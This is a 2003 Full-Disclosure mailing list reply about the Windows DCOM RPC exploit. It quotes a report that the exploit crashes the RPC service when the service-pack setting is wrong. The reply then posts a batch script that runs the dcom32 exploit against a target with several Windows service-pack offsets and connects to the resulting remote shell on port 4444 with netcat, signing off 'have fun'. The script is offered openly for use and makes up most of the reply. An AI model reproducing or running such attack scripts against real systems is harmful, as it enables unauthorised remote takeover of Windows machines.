Re: dcom exploit code observations

["morning_wood" <se_cur_ity () hotmail com>]

----- Original Message ----- 
From: "john" <seclist () wiresec net>
To: <full-disclosure () lists netsys com>
Sent: Monday, July 28, 2003 7:42 AM
Subject: [Full-disclosure] dcom exploit code observations


> Downloaded the revised exploit code by HD moore and got it compiled on a
> linux box.
>
> There seems to either be some flaws in the exploit code or just a
> general instability of the rpc service.
>
> If the code is run against a vulnerable box and the right SP level
> setting is not correct it crashes the rpc service and shuts down the
> port. Restarting the service will bring it back online. If the attack is
> successful you get a nice pretty windows shell. If you exit the shell
> the rpc service again crashes.
>
> I am sure the code will be revised to eliminate these problems.
>
> John
THIS IS NOT THE CASE...
this .bat works perfect... 
------------  snip -------------------
@echo on
@echo .....................................................
@echo   RPC script by morning_wood
@echo ....................................................
wait
@echo ...
@echo trying XP Service Pack 0
dcom32  5 %1
nc -v -n %1 4444
wait
@echo trying XP Service Pack 1
dcom32 6 %1
nc -v -n %1 4444
wait
@echo trying 2K Service Pack 4
dcom32 4 %1
nc -v -n %1 4444
wait
@echo ........... have fun
wait
@echo bye now
exit
--------  snip -------------------

w00d
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html